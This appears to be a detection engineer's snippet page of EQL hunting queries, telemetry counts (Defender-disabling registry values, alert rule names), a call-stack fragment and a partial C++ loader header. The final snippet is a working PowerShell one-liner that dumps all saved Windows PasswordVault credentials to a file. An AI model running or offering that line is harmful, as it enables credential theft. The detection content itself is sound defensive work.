Samirbous

sequence by process.entity_id
 [process where event.action == "start" and
  process.pe.original_file_name : ("cscript.exe", "wscript.exe", "AutoIt*.exe", "python*.exe") ]
 [network where process.uptime >= 300 and 
  event.action == "connection_attempted" and network.direction == "egress" and network.transport == "tcp" and source.port >= 49152 and not destination.address : ("127.*", "::1")]

Samirbous

"Top 1000 values of registry.path",Count
"HKLM\SYSTEM\ControlSet001\Services\WinDefend\Start","1,483"
"HKLM\SYSTEM\ControlSet001\Services\UsoSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\WaaSMedicSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService\Start",6
"HKLM\SYSTEM\ControlSet001\Services\Sense\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdBoot\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdFilter\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdNisDrv\Start",6

Samirbous

"Top 10000 values of registry.value","Count of records"
TamperProtection,"1,400"
DisableAntiSpyware,"1,388"
DisableBehaviorMonitoring,"1,381"
DisableIOAVProtection,"1,368"
DisableOnAccessProtection,"1,359"
DisableRealtimeMonitoring,"1,344"
DisableScanOnRealtimeEnable,"1,323"
DisableNotifications,"1,312"
AUOptions,"1,280"

Samirbous

 "thread": {
          "Ext": {
            "call_stack_summary": "ntdll.dll|kernelbase.dll|kernel32.dll|acmigration.dll|appraiser.dll|ntdll.dll|kernel32.dll|ntdll.dll",
            "call_stack": [
              {
                "symbol_info": "C:\\Windows\\System32\\ntdll.dll!ZwCreateUserProcess+0x14"
              },
              {
                "symbol_info": "C:\\Windows\\System32\\KernelBase.dll!CreateProcessInternalW+0xfe3"
              },

Samirbous

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>


typedef NTSTATUS(NTAPI* pLdrLoadDll) (
	PWCHAR PathToFile,
	ULONG Flags,
	PUNICODE_STRING ModuleFileName,

Samirbous

any where event.action == "Directory Service Access" and 
 event.code == "4662" and 
 not winlog.event_data.SubjectUserSid : "S-1-5-18" and 
 winlog.event_data.AccessListDescription : "Read Property" and 
 length(winlog.event_data.Properties) >= 800

Samirbous

"Top 1000 values of rule.name","Count of records"
"Connection to WebService by a Signed Binary Proxy",342
"Managed .NET Code Execution via PowerShell",79
"Execution via a Suspicious WMI Client",57
"Credential Access via Known Utilities",40
"Regsvr32 Scriptlet Execution",39
"Suspicious Bitsadmin Activity",34
"Suspicious Windows Command Shell Execution",32
"Script Execution via Microsoft HTML Application",28
"Suspicious Execution via Windows Management Instrumentation",27

Samirbous

sequence by host.id, process.entity_id with maxspan=3s
 [process where event.type == "start" and process.name : "svchost.exe" and process.args : "appmodel"]
 [network where event.action == "connection_accepted" and
  process.name : "svchost.exe" and
  source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1"]

Samirbous

sequence by host.id with maxspan=1m
 [registry where registry.path : "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*"] by registry.data.strings
 [process where event.action == "start" and

  /* recently created files  */
  process.Ext.relative_file_creation_time < 500] by process.executable

Samirbous

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
(new-object Windows.Security.Credentials.PasswordVault).RetrieveAll()|%{$_.RetrievePassword();$_}>"pwds.tmp"